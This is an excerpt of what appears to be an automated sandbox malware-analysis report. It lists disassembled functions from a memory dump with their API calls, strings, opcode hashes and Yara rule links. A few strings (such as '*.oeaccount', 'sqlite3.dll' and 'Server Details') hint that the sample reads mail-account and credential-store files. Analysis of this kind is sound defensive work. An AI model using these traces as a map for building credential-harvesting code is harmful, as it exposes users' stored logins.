                                                                                                                                                                                                                    Function 0040AB21 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AB44
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AB5A
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                      • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AB84
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                                                    • API String ID: 3699762281-259020660
                                                                                                                                                                                                                    • Opcode ID: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                                                                                    • Instruction ID: 40662a85ba39df66ab9e9dfe1085b05053bd092a42c83a93ebfe6a452f4dfa53
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa9275fcc028cffcefa48dde5847177ad6754b943bb00a3c6bf4d2e50bcd3c7a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F501F9729001296BE720A659DC45FDA776CAF45304F0400FAB60DF3182DB749E548BA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0044497B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                                                                                    • Instruction ID: 50686d444a9e23a331db2cec4592ac0caeb7afc27ca0d185df797a95cebddf31
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e69610b48158ddd1cace260c8b8c9f990ff9e3410e7d4f8ed62e5c6a57ef570
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70E0E6A170470196BA24ABBFBD55B1723ECAA84B66314092FB508D72B2DF2CD864D52C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004021F6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _ultoasprintf
                                                                                                                                                                                                                    • String ID: %s %s %s
                                                                                                                                                                                                                    • API String ID: 432394123-3850900253
                                                                                                                                                                                                                    • Opcode ID: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                                                    • Instruction ID: 4eecb7ebe0e72788cc5a9ba801a24b7f953e3738518a64b6aa949e1543d7b5d3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD41C431804A1987D538D5B4878DBEB62A8A702304F5504BFEC9AB32D1D7FCAE45866E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004086A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                                      • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                                      • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                                      • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                                      • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID: C@
                                                                                                                                                                                                                    • API String ID: 1449862175-3201871010
                                                                                                                                                                                                                    • Opcode ID: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                                                    • Instruction ID: 7447114fd14c0d02a0ee842544e77a6286768af896f3cc7789f687588c6d710a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88018871C04118AFDB00AF65DC45A8F7FB8DF05364F11C166F855B7191DB349A05CBA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409669 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409682
                                                                                                                                                                                                                    • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                                                    • String ID: 5\@
                                                                                                                                                                                                                    • API String ID: 568519121-3174280609
                                                                                                                                                                                                                    • Opcode ID: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                                    • Instruction ID: d98da3e135da4b1536afdd38015dbf476e5e9df788621b23f2aabad48e216af8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F901D679810204EBDB209F85C881EBBB7F8FF84745F10482AE840A6291D3359D95CB79
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00407211 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                                                    • String ID: L$ini
                                                                                                                                                                                                                    • API String ID: 714388716-4234614086
                                                                                                                                                                                                                    • Opcode ID: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                                    • Instruction ID: f535223de382355a817e33459d0294d4a206ca3c03f6505affaa6c17102478c3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE01B2B1D10218AFDF40DFA9D845ADEBBF4BB08348F14812AE515E6240EBB895458F99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041104F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00411074
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _msizerealloc
                                                                                                                                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                    • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                    • Opcode ID: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                                    • Instruction ID: 1811babadabc61a025a406b62bb89d9ddf1cf6d87da65dd644d5d85db6a8a765
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12D0C23290C2207EEA122644BC06A5BBB91DF90370F10C51FF618951A0DA3A8CA0638A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408DE1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
                                                                                                                                                                                                                      • Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                    • String ID: menu_%d
                                                                                                                                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                    • Opcode ID: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                                    • Instruction ID: fc9d5e34a24bd2be33db7f468ba420a1802cee0dbde2c18454a4e056650a0418
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96D0C23064174022FB3023266D0EF4B29595BC3B47F1400AEF400B10D2CBBC400486BE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                                                                                                                                                                                                    • strrchr.MSVCRT ref: 00409579
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040958E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                                                    • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                    • Opcode ID: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                                                    • Instruction ID: 2d2b68270352c45da0ce721119a0fec427a5e2ae0c2a4fc26ba4743072087242
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25C080521466A024F1173222AD03B4F05844F5370CF25005BFD01351C3EF9D453141FF
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406E81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                      • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                                      • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                    • String ID: sqlite3.dll
                                                                                                                                                                                                                    • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                    • Opcode ID: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                                                    • Instruction ID: b4f080e30331be102d7f345a143f57ec91a882a22c28ed8e87256c61ce2af050
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3C0803240513125BB0177717C028AF7D48DF82394B01046EF58561111DD694D3255EB
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004033A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString
                                                                                                                                                                                                                    • String ID: 34@$Server Details
                                                                                                                                                                                                                    • API String ID: 1096422788-1041202369
                                                                                                                                                                                                                    • Opcode ID: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                                                                                    • Instruction ID: 5dc36b059aaaf95d4d37dbe6dd28276a8f332030ee7f3b0879c7395586969e1a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFC04C36948B01BBDE029F909D05F1EBE62BBA8B01F504519F285210AB82754524EB26
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0042BE74 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                    • Opcode ID: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                                                                                    • Instruction ID: 1cbfd9147006f86015284e0c7f96a5a033359537089e49602f9f07bbf2bf02d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B761DE72604702AFDB20DF65E981A6BB7E4FF44304F44492EFA5982250D738ED54CBDA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004081FD Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3110682361-0
                                                                                                                                                                                                                    • Opcode ID: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                                                                                    • Instruction ID: 82d09d3ec766172f421874171fbd662b4eebf604b8883e80537bb62e226e9057
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0631F832D0011D9BDF10DB64CD81BDEBBB8EF55314F1005BAE984B7281DA799E85CB94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00415B07 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                                                    • Opcode ID: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                                                                                    • Instruction ID: c59a560e0875e34eddc7238b356bca14a42e0d2f6379eea325777a24e0ec34d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E11E6B7D00618ABDB01DFA4DC899DEB7ACEB49310F414836FA05CB140E634E2488799
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004096FB Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                    • Opcode ID: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                                                                                    • Instruction ID: 34b624653e935ab7e36b2538589d62cee4ebe89d27a66743b3a416ac641d4af2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8321B3B5A65300CEE7559F6A9845915FBE4FF90310B2AC8BF9218DB2B2D7B8C8408B15
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%